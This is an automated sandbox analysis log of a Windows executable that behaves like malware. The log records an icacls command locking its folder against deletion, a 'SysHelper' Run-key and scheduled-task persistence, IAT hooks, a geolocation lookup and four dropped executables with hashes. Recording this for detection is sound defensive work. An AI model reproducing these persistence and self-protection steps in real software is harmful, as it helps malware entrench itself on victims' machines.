Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 | True | 12
Get Handle | mscoree.dll | - | False | 1
Get Filename | - | process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe, size = 260 | True | 2
Get Filename | - | process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe, size = 1024 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x76c34f2b | True | 2
Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x76c31252 | True | 2
Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x76c34208 | True | 2
Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x76c3359f | True | 2
Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77170fcb | True | 8
Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77169d35 | True | 3
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateToolhelp32Snapshot, address_out = 0x76c5735f | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = Module32FirstW, address_out = 0x76c579f9 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x76c34d28 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x76cb410b | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x76cb4195 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x76c3d31f | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x76c4ee7e | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7717441c | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7719c381 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x76c4f088 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x771805d7 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7719ca24 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77150b8c | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x771a1e1d | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x76cb4761 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x76cacd11 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 | False | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x76cb424f | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x76cb46b1 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x76cc6676 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x76cb4751 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x76cc65f1 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x76cb47e1 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x76cb47f1 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 | False | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x76c4eee0 | True | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 | False | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 | False | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = EnumProcesses, address_out = 0x0 | False | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = EnumProcessModules, address_out = 0x0 | False | 1
Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleBaseNameW, address_out = 0x0 | False | 1
Get Address | c:\windows\syswow64\psapi.dll | function = EnumProcesses, address_out = 0x75141544 | True | 1
Get Address | c:\windows\syswow64\psapi.dll | function = EnumProcessModules, address_out = 0x75141408 | True | 1
Get Address | c:\windows\syswow64\psapi.dll | function = GetModuleBaseNameW, address_out = 0x7514152c | True | 1
Get Address | c:\windows\syswow64\shell32.dll | function = SHGetFolderPathW, address_out = 0x76055708 | True | 1
System (7)
Operation | Additional Information | Success | Count
Get Time | type = System Time, time = 2019-05-13 17:22:16 (UTC) | True | 1
Get Time | type = Ticks, time = 116267 | True | 1
Get Time | type = Performance Ctr, time = 16712249458 | True | 1
Get Time | type = System Time, time = 2019-05-13 17:22:21 (UTC) | True | 1
Get Time | type = Performance Ctr, time = 17284874121 | True | 1
Get Time | type = System Time, time = 2019-05-13 17:22:49 (UTC) | True | 1
Get Info | type = Operating System | True | 1
Environment (2)
Operation | Additional Information | Success | Count
Get Environment String | - | True | 2
Network Behavior
HTTP Sessions (1)
Information | Value
Total Data Sent | 467 bytes
Total Data Received | 7.12 KB
Contacted Host Count | 1
Contacted Hosts | 77.123.139.189
HTTP Session #1
Information | Value
Server Name | api.2ip.ua
Server Port | 443
Username | -
Password | -
Data Sent | 467 bytes
Data Received | 7.12 KB
Operation | Additional Information | Success | Count
Open Session | user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG | True | 1
Open Connection | protocol = https, server_name = api.2ip.ua, server_port = 443 | True | 1
Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json | True | 1
Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json | True | 1
Read Response | size = 10240, size_out = 465 | True | 1
Close Session | - | True | 1
Process #3: icacls.exe
Information | Value
ID | #3
File Name | c:\windows\syswow64\icacls.exe
Command Line | icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor | Start Time: 00:01:28, Reason: Child Process
Unmonitor | End Time: 00:01:29, Reason: Self Terminated
Monitor Duration | 00:00:01
Remark | No high level activity detected in monitored regions
OS Process Information
Information | Value
PID | 0x888
Parent PID | 0xa78 (c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe)
Bitness | 32-bit
Is Created or Modified Executable | False
Integrity Level | High (Elevated)
Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs | 0x580, 0x90
Process #4: taskeng.exe
Information | Value
ID | #4
File Name | c:\windows\system32\taskeng.exe
Command Line | taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]
Initial Working Directory | C:\Windows\system32\
Monitor | Start Time: 00:01:30, Reason: Created Scheduled Job
Unmonitor | End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration | 00:03:14
Remark | No high level activity detected in monitored regions
OS Process Information
Information | Value
PID | 0x50c
Parent PID | 0x36c (Unknown)
Bitness | 64-bit
Is Created or Modified Executable | False
Integrity Level | High (Elevated)
Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs | 0x984, 0x578, 0x574, 0x520, 0x514, 0x510, 0x840
Process #5: eb54.tmp.exe
Information | Value
ID | #5
File Name | c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe
Command Line | "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe" --Admin IsNotAutoStart IsNotTask
Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor | Start Time: 00:01:32, Reason: Child Process
Unmonitor | End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration | 00:03:12
OS Process Information
Information | Value
PID | 0x2c8
Parent PID | 0xa78 (c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe)
Bitness | 32-bit
Is Created or Modified Executable | True
Integrity Level | High (Elevated)
Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs | 0x204, 0x694, 0x2B0, 0x444, 0x684, 0x73C, 0x664, 0x738, 0x3D0, 0x8A8, 0x8A0, 0x890
Hook Information
Type | Installer | Target | Size | Information
IAT | private_0x0000000000240000:+0x5558d | 2. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:LoadLibraryW+0x0 now points to private_0x000000007fff0000:+0x9c22b0c
IAT | private_0x0000000000240000:+0x5558d | 3. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:TerminateThread+0x0 now points to private_0x000000007fff0000:+0x433cf85d
IAT | private_0x0000000000240000:+0x5558d | 4. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:WritePrivateProfileStructW+0x0 now points to private_0x000000007fff0000:+0x9115d8b
IAT | private_0x0000000000240000:+0x5558d | 5. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:TerminateProcess+0x0 now points to private_0x000000007fff0000:+0x610184d
IAT | private_0x0000000000240000:+0x5558d | 7. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0xbf97d8b
IAT | private_0x0000000000240000:+0x5558d | 8. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x79040c45
IAT | private_0x0000000000240000:+0x5558d | 12. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:LocalAlloc+0x0 now points to private_0x00000000006a0000:+0x1573
IAT | private_0x0000000000240000:+0x5558d | 13. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetProfileStringA+0x0 now points to private_0x000000007fff0000:+0xbf975ff
IAT | private_0x0000000000240000:+0x5558d | 18. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0xb8074f3
IAT | private_0x0000000000240000:+0x5558d | 19. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0x78841446
IAT | private_0x0000000000240000:+0x5558d | 20. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:lstrcpyA+0x0 now points to private_0x000000007fff0000:+0xb087208
IAT | private_0x0000000000240000:+0x5558d | 25. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x568c02eb
IAT | private_0x0000000000240000:+0x5558d | 26. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetDriveTypeW+0x0 now points to private_0x000000007fff0000:+0x5fd458b
IAT | private_0x0000000000240000:+0x5558d | 27. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:DuplicateHandle+0x0 now points to private_0x000000007fff0000:+0xb2274c0
IAT | private_0x0000000000240000:+0x5558d | 28. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GlobalMemoryStatus+0x0 now points to private_0x000000007fff0000:+0x4004085d
IAT | private_0x0000000000240000:+0x5558d | 33. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetStartupInfoA+0x0 now points to private_0x000000007fff0000:+0x3a7be850
IAT | private_0x0000000000240000:+0x5558d | 40. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetConsoleMode+0x0 now points to private_0x000000007fff0000:+0x4e8c02eb
IAT | private_0x0000000000240000:+0x5558d | 41. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:FlushFileBuffers+0x0 now points to private_0x000000007fff0000:+0x519458b
IAT | private_0x0000000000240000:+0x5558d | 42. entry of eb54.tmp.exe | 4 bytes | ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x69850fc0
IAT | private_0x0000000000240000:+0x5558d | 47. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:RtlUnwind+0x0 now points to private_0x000000007fff0000:+0x7a83e850
IAT | private_0x0000000000240000:+0x5558d | 48. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:HeapFree+0x0 now points to private_0x000000007fff0000:+0x44840001
IAT | private_0x0000000000240000:+0x5558d | 54. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetCurrentThreadId+0x0 now points to private_0x000000007fff0000:+0x6b0f8b04
IAT | private_0x0000000000240000:+0x5558d | 55. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:InterlockedDecrement+0x0 now points to private_0x000000007fff0000:+0x3cf8b02
IAT | private_0x0000000000240000:+0x5558d | 64. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:QueryPerformanceCounter+0x0 now points to private_0x000000007fff0000:+0x6b178b04
IAT | private_0x0000000000240000:+0x5558d | 65. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetTickCount+0x0 now points to private_0x000000007fff0000:+0x3d78b02
IAT | private_0x0000000000240000:+0x5558d | 69. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:GetACP+0x0 now points to private_0x000000007fff0000:+0x7c76ff0c
IAT | private_0x0000000000240000:+0x5558d | 72. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:WriteConsoleA+0x0 now points to private_0x000000007fff0000:+0x69420c8d
IAT | private_0x0000000000240000:+0x5558d | 75. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x315468b
IAT | private_0x0000000000240000:+0x5558d | 78. entry of eb54.tmp.exe | 4 bytes | ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x7884d68b
IAT | private_0x0000000000240000:+0x5558d | 79. entry of eb54.tmp.exe | 4 bytes | kernel32.dll:VirtualAlloc+0x0 now points to private_0x000000007fff0000:+0xb057208
IAT | private_0x0000000000240000:+0x5558d | 80. entry of eb54.tmp.exe | 4 bytes | ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0xb03eb0e
IAT | private_0x0000000000240000:+0x5558d | 84. entry of eb54.tmp.exe | 4 bytes | user32.dll:EndPaint+0x0 now points to private_0x000000007fff0000:+0xd20048d
IAT | private_0x0000000000240000:+0x5558d | 86. entry of eb54.tmp.exe | 4 bytes | user32.dll:EnumDisplaySettingsA+0x0 now points to private_0x000000007fff0000:+0xc00ff72
IAT | private_0x0000000000240000:+0x5558d | 87. entry of eb54.tmp.exe | 4 bytes | user32.dll:DrawTextExW+0x0 now points to private_0x000000007fff0000:+0x44841446
IAT | private_0x0000000000240000:+0x5558d | 90. entry of eb54.tmp.exe | 4 bytes | user32.dll:SetPropA+0x0 now points to private_0x000000007fff0000:+0x568c02eb
IAT | private_0x0000000000240000:+0x5558d | 92. entry of eb54.tmp.exe | 4 bytes | user32.dll:LoadImageA+0x0 now points to private_0x000000007fff0000:+0xb0f8b0e
IAT | private_0x0000000000240000:+0x5558d | 93. entry of eb54.tmp.exe | 4 bytes | user32.dll:DestroyCursor+0x0 now points to private_0x000000007fff0000:+0xd541445
Downloaded Files
Filename: C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe
File Size: 272.50 KB
MD5: 5b4bd24d6240f467bfbc74803c9f15b0
SHA1: c17f98c182d299845c54069872e8137645768a1a
SHA256: 14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e
SSDeep: 6144:7qZQGv0d4dW6efSyahstfKVkW5XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXk:2ZQGXdPe6qU6W5XXnXXfXXXWXXXXHXXE
YARA Match: False

Filename: C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe
File Size: 274.50 KB
MD5: 996ba35165bb62473d2a6743a5200d45
SHA1: 52169b0b5cce95c6905873b8d12a759c234bd2e0
SHA256: 5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d
SSDeep: 6144:vLgbC0mVQlY+3aKn7n4CTHcXXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXXP:vGCtQlb3aKzvT8XXnXXfXXXWXXXXHXXf
YARA Match: False

Filename: C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe
File Size: 277.50 KB
MD5: e3083483121cd288264f8c5624fb2cd1
SHA1: 144a1dd6714ff4b5675c32f428d1899e500140a5
SHA256: 114ccacb7ca57c01f3540611fdf49e68416544da8d8077f5896434a4b71b01dd
SSDeep: 6144:JMLLGApbfLsx8TsvD6OD61XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXX56:JMLdpMdhDyXXnXXfXXXWXXXXHXXXXBXK
YARA Match: False

Filename: C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe
File Size: 192.00 KB
MD5: 7637e83def3c66546bb4a6ee5e963b03
SHA1: a108e7bc6008a541dfbf0921839a75dd2e2831c5
SHA256: 48417c1248dfbde668a1118f1d1178ccd0a29612035f25f5724c10a2d6e98fcd
SSDeep: 3072:HZBj7PK5clI62E9+v81gl6GH0g8NKKkbGcsRwMfPNHXyfhfwE8bOLT7Pu5dFY:HzGcw6+816pKxwMXwYElnPM
YARA Match: False
Host Behavior
COM (8)
Operation | Class | Interface | Additional Information | Success | Count
Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER | True | 1
Execute | TaskScheduler | ITaskService | method_name = Connect, server_name = 95, domain = 95, password = 4289035 | True | 1
Execute | TaskScheduler | ITaskService | method_name = GetFolder, path = \, new_interface = ITaskFolder | True | 1
Execute | TaskScheduler | ITaskService | method_name = NewTask, new_interface = ITaskDefinition | True | 1
Execute | TaskScheduler | ITaskDefinition | method_name = get_Triggers, new_interface = ITriggerCollection | True | 1
Execute | TaskScheduler | ITriggerCollection | method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger | True | 1
Execute | TaskScheduler | IDailyTrigger | method_name = put_StartBoundary, start_boundary = 2019-05-14T03:23:26 | True | 1
Execute | TaskScheduler | ITaskDefinition | method_name = get_Actions, new_interface = IActionCollection | True | 1
File (613)
Operation | Filename | Additional Information | Success | Count
Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ | True | 1
Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ | True | 1
Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ | True | 1
Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ | True | 1
Create Directory | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0 | - | True | 1
Open | STD_INPUT_HANDLE | - | True | 2
Open | STD_OUTPUT_HANDLE | - | True | 2
Open | STD_ERROR_HANDLE | - | True | 2
Open | - | - | False | 498
Write | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe | size = 10240 | True | 27
Write | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe | size = 2560 | True | 1
Write | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe | size = 10240 | True | 27
Write | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe | size = 4608 | True | 1
Write | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe | size = 10240 | True | 27
Write | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe | size = 7680 | True | 1
Write | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe | size = 10240 | True | 19
Write | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe | size = 2048 | True | 1
Registry (5)
Operation | Key | Additional Information | Success | Count
Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | - | True | 1
Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion | - | True | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe" --AutoStart, type = REG_EXPAND_SZ | True | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion | value_name = SysHelper, data = 0, type = REG_NONE | False | 1
Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion | value_name = SysHelper, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN | True | 1
Process (51)
Operation | Process | Additional Information | Success | Count
Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe | show_window = SW_SHOWNORMAL | True | 1
Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe | show_window = SW_SHOWNORMAL | True | 1
Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe | show_window = SW_SHOWNORMAL | True | 1
Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe | show_window = SW_SHOWNORMAL | True | 1
Enumerate Processes | - | - | True | 1
Open | System | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\smss.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\services.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\windows\explorer.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\program files (x86)\adobe\jefferson balanced qualifications.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files (x86)\uninstall information\zero.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\msbuild\partial.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\windows sidebar\general_renewable_visual.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files (x86)\microsoft visual studio 8\hayes-arlington-photography.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\microsoft sql server compact edition\acc.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files (x86)\reference assemblies\battery.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\windows sidebar\jeffrey indiana.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\windows sidebar\vendor carey nicholas.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\uninstall information\fetish_cd_education.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files (x86)\internet explorer\hostel.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\microsoft office\engine.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\dvd maker\learners_textbooks.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files (x86)\microsoft office\gratuitjuryreasonable.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files (x86)\mozilla maintenance service\pursuit.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\uninstall information\zincshniagara.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files\msbuild\losses.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\program files (x86)\msbuild\technologies_signatures_notebooks.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | True | 1
Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION | False | 1
